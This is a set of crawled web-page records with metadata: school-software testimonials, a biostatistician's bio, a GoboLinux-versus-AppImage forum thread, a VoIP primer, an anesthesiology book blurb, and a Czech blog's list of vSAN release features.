proofreaders which make reviewing, printing, and PDF'ing simple and efficient. "Totally Awesome! is how I describe the three report card modules CORESytems built for us. In particular, the Enroller module cuts my time in half when creating and editing teacher and student schedules for the reports system. Also, the ODBC-driven reloading of Education Edge data has worked flawlessly for years. I can't think of anything better." — Doug Melillo, IT Support & System Operator "CORESystems' solutions are designed to maximize our productivity while minimizing errors when used by multiple users of varying abilities. Their designs also allow for easy updates and expansion as programs grow in reach and capability." Sunil Gupta, Director of Technology, Brunswick School CORESystems understands complex educational communities. Founded by an independent school teacher and administrator of 14 years, CORESystems gives teachers and parents ways to more efficiently record and communicate about student progress so that the better majority of their time was working directly with the student themselves. CORESystems quickly evolved to include all facets of school administration, including financial tracking, alumnae services, development, afterschool programs and summer camps. The CORESystems team challenges itself to build better, more streamlined, more efficient systems with the highest customer satisfaction. Their enthusiasm has resulted in data systems that are extremely personalized and have unparalleled support. As a customer of 13 years wrote, "You transformed my work environment! Your superb customization and highly personalized service continues to set CORESystems apart." "You guys rock!" Christine LaRegina, Registrar, Rippowam Cisqua School
systems_science
https://www.brad-carlin.com/about-bradley-carlin/
2020-07-13T04:18:26
s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657142589.93/warc/CC-MAIN-20200713033803-20200713063803-00190.warc.gz
0.955188
310
CC-MAIN-2020-29
webtext-fineweb__CC-MAIN-2020-29__0__126534962
en
Bradley Carlin is a PhD biostatistician with a strong interest and professional background in clinical study design, data analysis, programming, report-writing, methods development, and interaction with clients and regulatory authorities. Brad currently serves as the Founder and President of Counterpoint Statistical Consulting, a Minneapolis-based consulting firm that specializes in using data and modeling to find solutions to challenging problems in biomedicine. He previously served as the Head of the Division of Biostatistics at the University of Minnesota. Brad’s training and research has focused on hierarchical Bayesian statistical modeling and associated computational methods, including Markov chain Monte Carlo (MCMC) methods. He has a proven track record of publishing and externally funded methodological grant support in Bayesian methods, computing, and applications related to spatial and environmental statistics, clinical trials, and meta-analysis, as well as mentoring the research of others. Brad has also been involved in the creation and dissemination of user-friendly software for implementing these models in practice; both through his own website and through the CRAN archive. As the Head of the Division of Biostatistics at the University of Minnesota Brad taught a variety of both traditional academic courses and government, industry, and professional short courses in hierarchical Bayesian modeling and its implementation via the R and BUGS packages, with special emphasis on Bayesian adaptive clinical trials, including simulation of procedure operating characteristics. Brad has coauthored three leading textbooks on Bayesian methods, including one on adaptive methods for clinical trials.
systems_science
https://gobolinux.discourse.group/t/advantages-over-appimage/47
2021-07-26T17:25:06
s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046152144.81/warc/CC-MAIN-20210726152107-20210726182107-00133.warc.gz
0.953863
405
CC-MAIN-2021-31
webtext-fineweb__CC-MAIN-2021-31__0__34370768
en
Just out of curiosity, does Gobolinux solve any problems which appimages don’t? Assuming every piece of user-space software had an appimage distribution, would Gobolinux still have a technical advantage over a more traditional Unix system? There are fundamental differences between the two approaches. AppImages are mostly self-contained file system images that include the main program along with its dependencies. They’re conceptually more similar to Docker than to a distro such as GoboLinux – although with Docker you still have the benefit of reusing file system layers; in that case, AppImages are better compared to statically linked programs. Both AppImages and Docker attempt to solve the problem of software distribution by bundling dependencies with the main program. GoboLinux manages the installation of programs in a lightweight fashion as a regular distro does. The difference is that it’s possible to let multiple (and conflicting) versions of libraries to coexist and to create file system mappings that ensure the file system tree seen by a given program contains the right version of the dependencies it expects. My personal view on this is that distros are becoming container hosts and that, at some point in the future, when technical improvements like minimization of userspace filesystem overhead and improved deduplication at the storage layer are built into the kernels run by those distros, the technical advantages will tend to disappear. You will probably enjoy to read about the work done by RancherOS. They’ve made a distribution that’s precisely a container manager: every single package is self-contained in its own container, including essential services such as To be honest, the main advantage of any traditional Linux system over a container-heavy system is performance. If you have new enough hardware and don’t care much about power consumption, you can use all the containers you want, I suppose. I personally prefer a lean system, and I also prefer to have my software run locally.
systems_science
http://techijournal.blogspot.com/
2017-05-23T18:32:55
s3://commoncrawl/crawl-data/CC-MAIN-2017-22/segments/1495463607649.26/warc/CC-MAIN-20170523183134-20170523203134-00467.warc.gz
0.905951
387
CC-MAIN-2017-22
webtext-fineweb__CC-MAIN-2017-22__0__212243939
en
"VOIP", "IP Telephony", "Internet Telephony" are used interchangeably. It is also defined as the ability to transfer voice, fax and video over IP. 1995 - VocalTec has first introduced IP Telephony software product "Internet Phone" in 1995. This year is called the year of the Hobbyist. 1996 The year of Gateway. 1998 The year of Gatekeeper 1999 The year of the application Gateways: These are used to adapt traditional telephony to the Intenet. Gatekeepers: Responsible for address resolution and call routing. Codec's: Coders are used for efficient bandwidth utilization. The coder-decoder compression schemes (CODEC's) are enabled for both ends of connection and the conservations proceeds using Real-time Transport Protocol (RTP)/ User Datagram Protocol (UDP)/Internet Protocol (IP) as the protocol stack. In VOIP systems, analog voice signals are digitized and transmitted as a stream of data packets over a digital data network (called packet switched networks). In public switched telephone networks or PSTN (called Circuit-switched networks), a telephone call is reserved an end-to-end physical circuit between the origin and the destination for the duration of the call. Hence, for this duration of the call, the circuit is fully available to that call and is not available to any other network users. Whereas in packet switched networks, instead of reserving a circuit between endpoints, messages or files are broken up into many small packets and each packet might be taking different route from origin to destination. Thus circuit switched networks have poor utilization of network resources whereas this is eliminated in packet switched networks. Add-on services and unified messaging Merging of Voice and data Quality of Service (QoS) Quality of Voice (QoV) Standards and Interoperability
systems_science
http://www.us.elsevierhealth.com/product.jsp?isbn=9781455710300&navAction=&navCount=1
2015-10-08T16:40:14
s3://commoncrawl/crawl-data/CC-MAIN-2015-40/segments/1443737896527.58/warc/CC-MAIN-20151001221816-00023-ip-10-137-6-227.ec2.internal.warc.gz
0.890477
257
CC-MAIN-2015-40
webtext-fineweb__CC-MAIN-2015-40__0__10972672
en
(With Adobe DRM, readable with Adobe Digital Editions for PCs and Macs, and on most mobile devices except Kindle) This cutting-edge issue of Anesthesiology Clinics is divided into two sections. The first covers topics in perioperative clinical information systems (IS), including the following. The anatomy of an anesthesia information management system; vendor and market landscape; impact of lexicons on adoption of an IS; clinical research using an IS, real-time alerts and reminders using an IS; shortcomings and challenges of IS adoption; creating a real return-on-investment for IS implementation (life after HITECH); Quality improvement using automated data sources and reporting; and opportunities and challenges of implementing an enterprise IS in the OR. Section 2 is devoted to computers and covers the following topics. Advanced integrated real-time clinical displays; enhancing point-of-care vigilance using computers; and computers in perioperative simulation and education. Elsevier is a leading publisher of health science books and journals, helping to advance medicine by delivering superior education, reference information and decision support tools to doctors, nurses, health practitioners and students. With titles available across a variety of media—print, online and mobile, we are able to supply the information you need in the most convenient format.
systems_science
https://virtualguru.cz/2023/11/06/vsan-versions-whats-new/
2023-12-01T14:02:06
s3://commoncrawl/crawl-data/CC-MAIN-2023-50/segments/1700679100287.49/warc/CC-MAIN-20231201120231-20231201150231-00160.warc.gz
0.859899
12,028
CC-MAIN-2023-50
webtext-fineweb__CC-MAIN-2023-50__0__26629107
en
Vyhledem k tomu, že starší verze postupně přestávají být podporované a tím pádem se i dokumentace k nim “ztrácí”, rozhodl jsem se udělat stránku, na které budu vždy s novou verzí přidávat, co nová verze přináší za vylepšení. První verze jsem nestihl předtím, než byly release notes z dokumentace staženy. - All-flash configurations - 64 host cluster scalability - 2x performance increase for hybrid configurations - New snapshot mechanism - Enhanced cloning mechanism - Fault domain/rack awareness - Stretched clustering across a max of 5 ms RTT - 2-node vSAN for remote office, branch office solutions - VRealize operations management pack - vSphere Replication 5 minute RPO - Health monitoring - RAID 5/6 over network (Erasure coding) - Space Efficiency (deduplication and compression) - QoS – IOPS limits - Software checksums - IPv6 support - Performance monitoring - iSCSI target service. The Virtual SAN iSCSI target service enables physical workloads that are outside the Virtual SAN cluster to access the Virtual SAN datastore. An iSCSI initiator on a remote host can transport block-level data to an iSCSI target on a storage device in the Virtual SAN cluster. - 2 Node Direct Connect with witness traffic separation. Virtual SAN 6.5 provides support for an alternate VMkernel interface to communicate with the witness host in a stretched cluster configuration. This support enables you to separate witness traffic from Virtual SAN data traffic, with no routing required from the Virtual SAN network to the witness host. You can simplify connectivity to the witness host in certain stretched cluster and 2 Node configurations. In 2 Node configurations, you can make one or more node-to-node, direct connections for Virtual SAN data traffic, without using a high speed switch. Using an alternate VMkernel interface for witness traffic is supported in stretched cluster configurations, but only when it is connected to the same physical switch as the interface used for Virtual SAN data traffic. - PowerCLI support. VMware vSphere PowerCLI adds command-line scripting support for Virtual SAN, to help you automate configuration and management tasks. vSphere PowerCLI provides a Windows PowerShell interface to the vSphere API. PowerCLI includes cmdlets for administering Virtual SAN components. - 512e drive support. Virtual SAN 6.5 supports 512e magnetic hard disk drives (HDDs) in which the physical sector size is 4096 bytes, but the logical sector size emulates a sector size of 512 bytes. - Unicast. In vSAN 6.6 and later releases, multicast is not required on the physical switches that support the vSAN cluster. If some hosts in your vSAN cluster are running earlier versions of software, a multicast network is still required. - Encryption. vSAN supports data-at-rest encryption of the vSAN datastore. When you enable encryption, vSAN performs a rolling reformat of every disk group in the cluster. vSAN encryption requires a trusted connection between vCenter Server and a key management server (KMS). The KMS must support the Key Management Interoperability Protocol (KMIP) 1.1 standard. - Enhanced stretched cluster availability with local fault protection. You can provide local fault protection for virtual machine objects within a single site in a stretched cluster. You can define a Primary level of failures to tolerate for the cluster, and a Secondary level of failures to tolerate for objects within a single site. When one site is unavailable, vSAN maintains availability with local redundancy in the available site. - Enhanced stretched cluster availability with local fault protection. You can provide local fault protection for virtual machine objects within a single site in a stretched cluster. Define a Primary level of failures to tolerate for the cluster, and a Secondary level of failures to tolerate for objects within a single site. When one site is unavailable, vSAN maintains availability with local redundancy in the available site. - Change witness host. You can change the witness host for a stretched cluster. On the Fault Domains and Stretched Cluster page, click Change witness host. - Configuration Assist and Updates. You can use the Configuration Assist and Updates pages to check the configuration of your vSAN cluster, and resolve any issues. - Configuration Assist helps you verify the configuration of cluster components, resolve issues, and troubleshoot problems. Configuration checks are divided into categories, similar to those in the vSAN health service. The configuration checks cover hardware compatibility, network, and vSAN configuration options. - You can use the Updates page to update storage controller firmware and drivers to meet vSAN requirements. - Resynchronization throttling. You can throttle the IOPS used for cluster resynchronization. Use this control if latencies are rising in the cluster due to resynchronization, or if resynchronization traffic is too high on a host. - Health service enhancements. New and enhanced health checks for encryption, cluster membership, time drift, controller firmware, disk groups, physical disks, disk balance. Online health checks can monitor vSAN cluster health and send the data to the VMware analytics backend system for advanced analysis. You must participate in the Customer Experience Improvement Program to use online health checks. - Updated Host-based vSAN monitoring. You can monitor vSAN health and basic configuration through the ESXi host client. In the host client navigator, click Storage. Select the vSAN datastore, and then click Monitor. Click the tabs to view vSAN information for the host. On the vSAN tab, you can click Edit Settings to correct configuration issues at the host level. - Performance service enhancements. vSAN performance service includes statistics for networking, resynchronization, and iSCSI. You can select saved time ranges in performance views. vSAN saves each selected time range when you run a performance query. - vSAN integration with vCenter Server Appliance. You can create a vSAN cluster as you deploy a vCenter Server Appliance, and host the appliance on that cluster. The vCenter Server Appliance Installer enables you to create a one-host vSAN cluster, with disks claimed from the host. vCenter Server Appliance is deployed on the vSAN cluster. - Maintenance mode enhancements. The Confirm Maintenance Mode dialog box provides information to guide your maintenance activities. You can view the impact of each data evacuation option. For example, you can check whether enough free space is available to complete the selected option. - Rebalancing and repair enhancements. Disk rebalancing operations are more efficient. Manual rebalancing operation provides better progress reporting. - Rebalancing protocol has been tuned to be more efficient and achieve better cluster balance. Manual rebalance provides more updates and better progress reporting. - More efficient repair operations require fewer cluster resynchronizations. vSAN can partially repair degraded or absent components to increase the Failures to tolerate even if vSAN cannot make the object compliant. - Disk failure handling. If a disk experiences sustained high latencies or congestion, vSAN considers the device as a dying disk, and evacuates data from the disk. vSAN handles the dying disk by evacuating or rebuilding data. No user action is required, unless the cluster lacks resources or has inaccessible objects. When vSAN completes evacuation of data, the health status is listed as DyingDiskEmpty. vSAN does not unmount the failed device. - New esxcli commands. - Display vSAN cluster health: esxcli vsan health - Display vSAN debug information: esxcli vsan debug - vSphere Update Manager build recommendations for vSAN. Update Manager can scan the vSAN cluster and recommend host baselines that include updates, patches, and extensions. It manages recommended baselines, validates the support status from vSAN HCL, and downloads the correct ESXi ISO images from VMware. vSAN requires Internet access to generate build recommendations. If your vSAN cluster uses a proxy to connect to the Internet, vSAN can generate recommendations for patch upgrades, but not for major upgrades. - Performance diagnostics. The performance diagnostics tool analyzes previously executed benchmark tests. It detects issues, suggests remediation steps, and provides supporting performance graphs for further insight. Performance diagnostics requires participation in the Customer Experience Improvement Program (CEIP). - Increased support for locator LEDs on vSAN disks. Gen-9 HPE controllers in pass-through mode now support vSAN activation of locator LEDs. Blinking LEDs help to identify and isolate specific drives. - 4Kn drive support. vSAN 6.7 supports 4K Native disk drives. 4Kn drives provide higher capacity densities compared to 512n. This support enables you to deploy storage heavy configurations using 4Kn drives with higher capacity points. - vSphere and vSAN FIPS 140-2 validation. vSAN 6.7 encryption has been validated for the Federal Information Processing Standard 140-2. FIPS validated software modules have numerous advantages over special purpose hardware, because they can be executed on a general-purpose computing system, providing portability and flexibility. You can configure a vSAN host using any HCL-compatible set of drives in thousands of form factors, capacities and features, while maintaining data security using FIPS 140-2 validated modules. - HTML interface. The HTML5-based vSphere Client ships with vCenter Server alongside the Flex-based vSphere Web Client. The vSphere Client uses many of the same interface terminologies, topologies, and workflows as the vSphere Web Client. You can use the new vSphere Client, or continue to use the vSphere Web Client. - vRealize Operations within vCenter Server. The vSphere Client includes an embedded vRealize Operations plugin that provides basic vSAN and vSphere operational dashboards. The plugin provides a method to easily deploy a new vROps instance or specify an existing instance in the environment, one of which is required to access the dashboards. The vROps plugin does not require any additional vROps licensing. - Windows Server Failover Clustering support. vSAN 6.7 supports Windows Server Failover Clustering by building WSFC targets on top of vSAN iSCSI targets. vSAN iSCSI target service supports SCSI-3 Persistent Reservations for shared disks and transparent failover for WSFC. WSFC can run on either physical servers or VMs. - Intelligent site continuity for stretched clusters. In the case of a partition between the preferred and secondary data sites, vSAN 6.7 will intelligently determine which site leads to maximum data availability before automatically forming quorum with the witness. The secondary site can operate as the active site until the preferred site has the latest copy of the data. This prevents the VMs from migrating back to the preferred site and losing locality of data reads. - Witness traffic separation for stretched clusters. You now have the option to configure a dedicated VMkernel NIC for witness traffic. The witness VMkernel NIC does not transmit any data traffic. This feature enhances data security by isolating the witness traffic from vSAN data traffic. It also is useful when the witness NIC has less bandwidth and latency compared to the data NICs. - Efficient inter-site resync for stretched clusters. Instead of resyncing all copies across the inter-site link for a rebuild or repair operation, vSAN 6.7 sends only one copy and performs the remaining resyncs from that local copy. This reduces the amount of data transmitted between sites in a stretched cluster. - Fast failovers when using redundant vSAN networks. When vSAN 6.7 is deployed with multiple VMkernel adapters for redundancy, failure of one of the adapters will result in immediate failover to the other VMkernel adapter. In prior releases, vSAN waits for TCP to timeout before failing over network traffic to healthy VMkernel adapters. - Adaptive resync for dynamic management of resynchronization traffic. Adaptive resynchronization speeds up time to compliance (restoring an object back to its provisioned failures to tolerate) by allocating dedicated bandwidth to resynchronization I/O. Resynchronization I/O is generated by vSAN to bring an object back to compliance. While minimum bandwidth is guaranteed for resynchronization I/Os, the bandwidth can be increased dynamically if there is no contention from the client I/O. Conversely, if there are no resynchronization I/Os, client I/Os can use the additional bandwidth. - Consolidation of replica components. During placement, components belonging to different replicas are placed in different fault domains, due to the replica anti-affinity rule. However, when the cluster is running at high capacity utilization and objects must be moved or rebuilt, either because of maintenance operation or failure, enough FDs might not be available. Replica consolidation is an improvement over the point fix method used in vSAN 6.6. Whereas point fix reconfigures the entire RAID tree (considerable data movement), replica consolidation moves the least amount of data to create FDs that meet the replica anti-affinity requirement. - Host pinning for shared nothing applications. vSAN Host Pinning is a new storage policy that adapts the efficiency and resiliency of vSAN for next-generation, shared-nothing applications. With this policy, vSAN maintains a single copy of the data and stores the data blocks local to the ESXi host running the VM. This policy is offered as a deployment choice for Big Data (Hadoop, Spark), NoSQL, and other such applications that maintain data redundancy at the application layer. vSAN Host Pinning has specific requirements and guidelines that require VMware validation to ensure proper deployment. You must work with your VMware representative to ensure the configuration is validated before deploying this policy. - Enhanced diagnostics partition (coredump) support. vSAN 6.7 automatically resizes the coredump partition on USB/SD media if there is free space on the device, so that coredumps and logs can be persisted locally. If there is insufficient free space or no boot device is present, then no re-partitioning is performed. - vSAN destaging optimizations. vSAN 6.7 includes enhancements to improve the speed at which data is written from the caching tier to the capacity tier. These changes will improve the performance of VM I/Os and resynchronization speed. - Health check additions and improvements. vSAN 6.7 includes several new health checks and improvements to the health service for better proactive and reactive guidance. - vSAN Support insight. vSAN 6.7 has improved customer support by providing anonymized environmental data to VMware Global Support Services (GSS) for proactive support and faster troubleshooting. Customer enrollment in the Customer Experience Improvement Program (CEIP) is required to receive this benefit. - Swap object thin provisioning and policy inheritance improvements. VM swap files in vSAN 6.7 inherit the VM storage policy for all settings, including thin provisioning. In prior versions, the swap file was always thick provisioned. - Guided cluster creation and extension. vSAN 6.7 Update 1 introduces a Quickstart wizard in the vSphere Client. The Quickstart workflow guides the user through the deployment process for vSAN and non-vSAN clusters. It covers every aspect of the initial configuration, such as host, network, and vSphere settings. Quickstart also plays a part in the ongoing expansion of a vSAN cluster by allowing a user to add additional hosts to the cluster. - HBA firmware update through VUM. Storage I/O controller firmware for vSAN hosts is now included as part of the vSphere Update Manager remediation workflow. This functionality was previously provided in a vSAN utility called Configuration Assist. VUM also supports custom ISOs that are provided by certain OEM vendors and vCenter Servers that do not have internet connectivity. - Maintenance mode enhancements. vSAN now performs a simulation of data evacuation to determine if the operation will succeed or fail before it starts. If the evacuation will fail, vSAN halts the operation before any resynchronization activity begins. In addition, the vSphere Client enables you to modify the component repair delay timer, so you can adjust this setting. - Historical and usable capacity reporting. vSAN 6.7 Update 1 introduces a historical capacity dashboard that reports on capacity usage over a period of time, including historical changes to the deduplication ratio. This release also includes a usable capacity estimator, which enables you to see the usable datastore capacity based on a selected storage policy. - TRIM/UNMAP for storage efficiency. vSAN 6.7 Update 1 now has full awareness of TRIM/UNMAP commands sent from the Guest OS, and reclaims previously allocated blocks as free space within the underlying vSAN objects. TRIM/UNMAP can be configured in automatic or offline mode, which is set within the Guest OS. - Mixed MTU for witness traffic separation. vSAN now supports different MTU settings for the witness traffic VMkernel interface and the vSAN data network VMkernel interface. This capability provides increased network flexibility for stretched clusters and 2-node clusters that utilize witness traffic separation. - Health check enhancements. Storage controller firmware health check now supports multiple approved firmware levels to provide additional flexibility. You can silence health checks from the UI. You can purge inaccessible swap objects that are no longer needed. The All hosts have matching subnets health check has been deprecated. - Unicast network performance test. A new proactive network performance test, based on Unicast, determines if all hosts in the cluster have proper connectivity and meet bandwidth recommendations. - vRealize Operations enhancements within vCenter Server. Native vROps dashboards built into vCenter Server can display intelligence for vSAN stretched clusters. Additionally, the deployment process now supports virtual distributed switches and full compatibility with vROps 7.0. - In-product support diagnostics. vSAN 6.7 Update 1 introduces product diagnostics to assist VMware Global Support in resolving customer cases more quickly. Specialized performance dashboards in vCenter Server, and an on-demand network diagnostic test, reduce the need to generate and upload support bundles to GSS, speeding time to resolution of support cases. In addition, health check history is stored in a log file to aid support personnel. - Updated Advanced settings. The vSphere Client provides an Advanced settings dialog box (Configure > vSAN > Services > Advanced Options). You can adjust the component repair delay timer. You also can enable/disable thin swap files, and site read locality. - vSAN performance enhancements. This release provides improved performance and availability SLAs on all-flash configurations with deduplication enabled. Latency sensitive applications have better performance in terms of predictable I/O latencies and increased sequential I/O throughput. Rebuild times on disk and node failures are shorter, which provides better availability SLAs. - Enhanced capacity monitoring. The capacity monitoring dashboard has been redesigned for improved visibility of overall usage, granular breakdown, and simplified capacity alerting. Capacity-related health checks are more visible and consistent. Granular capacity utilization is available per site, fault domain, and at the host/disk group level. - Enhanced resync monitoring. The Resyncing Objects dashboard introduces new logic to improve the accuracy of resync completion times, as well as granular visibility into different types of resyncing activity, such as rebalancing or policy compliance. - Data migration pre-check for maintenance mode operations. This release of vSAN introduces a dedicated dashboard to provide in-depth analysis for host maintenance mode operations, including a more descriptive pre-check for data migration activities. This report provides deeper insight into object compliance, cluster capacity and predicted health before placing a host into maintenance mode. - Increased hardening during capacity-strained scenarios. This release includes new robust handling of capacity usage conditions for improved detection, prevention, and remediation of conditions where cluster capacity has exceeded recommended thresholds. - Proactive rebalancing enhancements. You can automate all rebalancing activities with cluster-wide configuration and threshold settings. Prior to this release, proactive rebalancing was manually initiated after being alerted by vSAN health checks. - Efficient capacity handling for policy changes. This release of vSAN introduces new logic to reduce the amount of space temporarily consumed by policy changes across the cluster. vSAN processes policy resynchronizations in small batches, which efficiently utilizes capacity from the slack space reserve and simplifies user operations. - Disk format conversion pre-checks. All disk group format conversions that require a rolling data evacuation now include a backend pre-check which accurately determines success or failure of the operation before any movement of data. - Parallel resynchronization. vSAN 6.7 Update 3 includes optimized resynchronization behavior, which automatically runs additional data streams per resyncing component when resources are available. This new behavior runs in the background and provides greater I/O management and performance for workload demands. - Windows Server Failover Clusters (WSFC) on native vSAN VMDKs. vSAN 6.7 Update 3 introduces native support for SCSI-3 PR, which enables Windows Server Failover Clusters to be deployed directly on VMDKs as first class workloads. This capability makes it possible to migrate legacy deployments on physical RDMs or external storage protocols to vSAN. - Enable Support Insight in the vSphere Client. You can enable vSAN Support Insight, which provides access to all vSAN proactive support and diagnostics based on the CEIP, such as online vSAN health checks, performance diagnostics and improved support experience during SR resolution. - vSphere Update Manager (VUM) baseline preference. This release includes an improved vSAN update recommendation experience from VUM, which allows users to configure the recommended baseline for a vSAN cluster to either stay within the current version and only apply available patches or updates, or upgrade to the latest ESXi version that is compatible with the cluster. - Upload and download VMDKs from a vSAN datastore. This release adds the ability to upload and download VMDKs to and from the vSAN datastore. This capability provides a simple way to protect and recover VM data during capacity-strained scenarios. - vCenter forward compatibility with ESXi. vCenter Server can manage newer versions of ESXi hosts in a vSAN cluster, as long as both vCenter and it’s managed hosts have the same major vSphere version. You can apply critical ESXi patches without updating vCenter Server to the same version. - New performance metrics and troubleshooting utility. This release introduces a vSAN CPU metric through the performance service, and provides a new command-line utility (vsantop) for real-time performance statistics of vSAN, similar to esxtop for vSphere. - vSAN iSCSI service enhancements. The vSAN iSCSI service has been enhanced to allow dynamic resizing of iSCSI LUNs without disruption. - Cloud Native Storage. Cloud Native Storage is a solution that provides comprehensive data management for stateful applications. With Cloud Native Storage, vSphere persistent storage integrates with Kubernetes. When you use Cloud Native Storage, you can create persistent storage for containerized stateful applications capable of surviving restarts and outages. Stateful containers orchestrated by Kubernetes can leverage storage exposed by vSphere (vSAN, VMFS, NFS) while using standard Kubernetes volume, persistent volume, and dynamic provisioning primitives. - vSphere Lifecycle Manager. vSphere Lifecycle Manager enables simplified, consistent lifecycle management for your ESXi hosts. It uses a desired-state model that provides lifecycle management for the hypervisor and the full stack of drivers and firmware. vSphere Lifecycle Manager reduces the effort to monitor compliance for individual components and helps maintain a consistent state for the entire cluster. In vSAN 7.0, this solution supports Dell and HPE ReadyNodes. With vCenter Server 7.0.0a, vSAN File Services and vSphere Lifecycle Manager can be enabled simultaneously on the same vSAN cluster. - Integrated File Services. vSAN native File Service delivers the ability to leverage vSAN clusters to create and present NFS v4.1 and v3 file shares. vSAN File Service extends vSAN capabilities to files, including availability, security, storage efficiency, and operations management. - Native support for NVMe hot plug. This enhancement delivers a consistent way of servicing NVMe devices, and provides operational efficiency for select OEM drives. - I/O redirect based on capacity imbalance with stretched clusters. vSAN redirects all VM I/O from a capacity-strained site to the other site, untill the capacity is freed up. This feature improves uptime of your VMs. - Skyline integration with vSphere health and vSAN health. Joining forces under the Skyline brand, Skyline Health for vSphere and vSAN are available in the vSphere Client, enabling a native, in-product experience with consistent proactive analytics. - Remove EZT for shared disk. vSAN 7.0 eliminates the prerequisite that shared virtual disks using the multi-writer flag must also use the eager zero thick format. - Support vSAN memory as metric in performance service. vSAN memory usage is now available within the vSphere Client and through the API. - Visibility of vSphere Replication objects in vSAN capacity view. vSphere replication objects are visible in vSAN capacity view. Objects are recognized as vSphere replica type, and space usage is accounted for under the Replication category. - Support for large capacity drives. Enhancements extend support for 32TB physical capacity drives, and extend the logical capacity to 1PB when deduplication and compression is enabled. - Immediate repair after new witness is deployed. When vSAN performs a replace witness operation, it immediately invokes a repair object operation after the witness has been added. - vSphere with Kubernetes integration. CNS is the default storage platform for vSphere with Kubernetes. This integration enables various stateful containerized workloads to be deployed on vSphere with Kubernetes Supervisor and Guest clusters on vSAN, VMFS and NFS datastores. - File-based persistent volumes. Kubernetes developers can dynamically create shared (Read/Write/Many) persistent volumes for applications. Multiple pods can share data. vSAN native File Services is the foundation that enables this capability. - vVol support for modern applications. You can deploy modern Kubernetes applications to external storage arrays on vSphere using the CNS support added for vVols. vSphere now enables unified management for Persistent Volumes across vSAN, NFS, VMFS and vVols. - vSAN VCG notification service. You can subscribe to vSAN HCL components such as vSAN ReadyNode, I/O controller, drives (NVMe, SSD, HDD) and get notified through email about any changes. The changes include firmware, driver, driver type (async/inbox), and so on. You can track the changes over time with new vSAN releases. - New: Default gateway override. With ESXi 7.0b, vSAN enables you to override the default gateway for the vSAN VMkernel adapter on each host, and configure a gateway address for the vSAN network. Scale Without Compromise - HCI Mesh. HCI Mesh is a software-based approach for disaggregation of compute and storage resources in vSAN. HCI Mesh brings together multiple independent vSAN clusters by enabling cross-cluster utilization of remote datastore capacity within vCenter Server. HCI Mesh enables you to efficiently utilize and consume data center resources, which provides simple storage management at scale. - vSAN File Service enhancements. Native vSAN File Service includes support for SMB file shares. Support for Microsoft Active Directory, Kerberos authentication, and scalability improvements also are available. - Compression-only vSAN. You can enable compression independently of deduplication, which provides a storage efficiency option for workloads that cannot take advantage of deduplication. With compression-only vSAN, a failed capacity device only impacts that device and not the entire disk group. - Increased usable capacity. Internal optimizations allow vSAN to no longer need the 25-30% of free space available for internal operations and host failure rebuilds. The amount of space required is a deterministic value based on deployment variables, such as size of the cluster and density of storage devices. These changes provide more usable capacity for workloads. - Shared witness for two-node clusters. vSAN 7.0 Update 1 enables a single vSAN witness host to manage multiple two-node clusters. A single witness host can support up to 64 clusters, which greatly reduces operational and resource overhead. - vSAN Data-in-Transit encryption. This feature enables secure over the wire encryption of data traffic between nodes in a vSAN cluster. vSAN data-in-transit encryption is a cluster-wide feature, and can be enabled independently or along with vSAN data-at-rest encryption. Traffic encryption uses the same FIPS-2 validated cryptographic module as existing encryption features, and does not require use of a KMS server. - Enhanced data durability during maintenance mode. This improvement protects the integrity of data when you place a host into maintenance mode with the Ensure Accessibility option. All incremental writes which would have been written to the host in maintenance are now redirected to another host, if one is available. This feature benefits VMs that have PFTT=1 configured, and also provides an alternative to using PFTT=2 for ensuring data integrity during maintenance operations. - vLCM enhancements. vSphere Lifecycle Manager (vLCM) is a solution for unified software and firmware lifecycle management. In this release, vLCM is enhanced with firmware support for Lenovo ReadyNodes, awareness of vSAN stretched cluster and fault domain configurations, additional hardware compatibility pre-checks, and increased scalability for concurrent cluster operations. - Reserved capacity. You can enable capacity reservations for internal cluster operations and host failure rebuilds. Reservations are soft-thresholds designed to prevent user-driven provisioning activity from interfering with internal operations, such as data rebuilds, rebalancing activity, or policy re-configurations. - Default gateway override. You can override the default gateway for VMkernel adapter to provide a different gateway for vSAN network. This feature simplifies routing configuration for stretched clusters, two-node clusters, and fault domain deployments that previously required manual configuration of static routes. Static routing is not necessary. - Faster vSAN host restarts. The time interval for a planned host restart has been reduced by persisting in-memory metadata to disk before the restart or shutdown. This method reduces the time required for hosts in a vSAN cluster to restart, which decreases the overall cluster downtime during maintenance windows. - Workload I/O analysis. Analyze VM I/O metrics with IOInsight, a monitoring and troubleshooting tool that is integrated directly into vCenter Server. Gain a detailed view of VM I/O characteristics such as performance, I/O size and type, read/write ratio, and other important data metrics. You can run IOInsight operations against VMs, hosts, or the entire cluster. - Consolidated I/O performance view. You can select multiple VMs, and display a combined view of storage performance metrics such as IOPS, throughput, and latency. You can compare storage performance characteristics across multiple VMs. - VM latency monitoring with IOPS limits. This improvement in performance monitoring helps you distinguish the periods of latency that can occur due to enforced IOPS limits. This view can help organizations that set IOPS limits in VM storage policies. - Secure drive erase. Securely wipe flash storage devices before decommissioning from a vSAN cluster through a set of new PowerCLI or API commands. Use these commands to safely erase data in accordance to NIST standards. - Data migration pre-check for disks. vSAN’s data migration pre-check for host maintenance mode now includes support for individual disk devices or entire disk groups. This offers more granular pre-checks for disk or disk group decommissioning. - VPAT section 508 compliant. vSAN is compliant with the Voluntary Product Accessibility Template (VPAT). VPAT section 508 compliance ensures that vSAN had a thorough audit of accessibility requirements, and has instituted product changes for proper compliance. Scale without Compromise - HCI Mesh. HCI Mesh now enables vSAN clusters to share capacity with vSphere compute-only clusters, or non-HCI based clusters. You can also specify storage rules for recommended data placement, to find a compatible datastore. Scalability for a single remote vSAN datastore has been increased to 128 hosts. - vSAN File Service enhancements. vSAN File Service now supports stretched cluster deployments and two-node clusters. Scalability is increased to 64 hosts and 100 shares per cluster. - Stretched cluster enhancements. A stretched cluster now can include up to 20 hosts at each site. DRS awareness of stretched clusters provides more consistent performance during failback situations. - vSAN over RDMA. vSAN over RDMA delivers increased performance and enables you to obtain better VM consolidation ratios. - Enhanced platform performance. Improves platform NUMA awareness to deliver increased performance. Boost Infrastructure and Data Security - vSphere Native Key Provider. vSAN supports vSphere Native Key Provider for built-in encryption. - Data-in-transit encryption for vSAN File Service. Security enhancements to File Service include support for data-in-transit encryption, when File Service is enabled along with vSAN data-in-transit encryption. - Data-in-transit encryption for shared witness. vSAN 7.0 Update 2 supports data-in-transit encryption for shared witness hosts. - vLCM enhancements. vLCM now supports firmware updates for select Hitachi UCP HC servers, along with existing support for select Dell EMC, HPE and Lenovo servers. vLCM can update vSphere with Tanzu clusters configured with NSX-T networking. In addition, 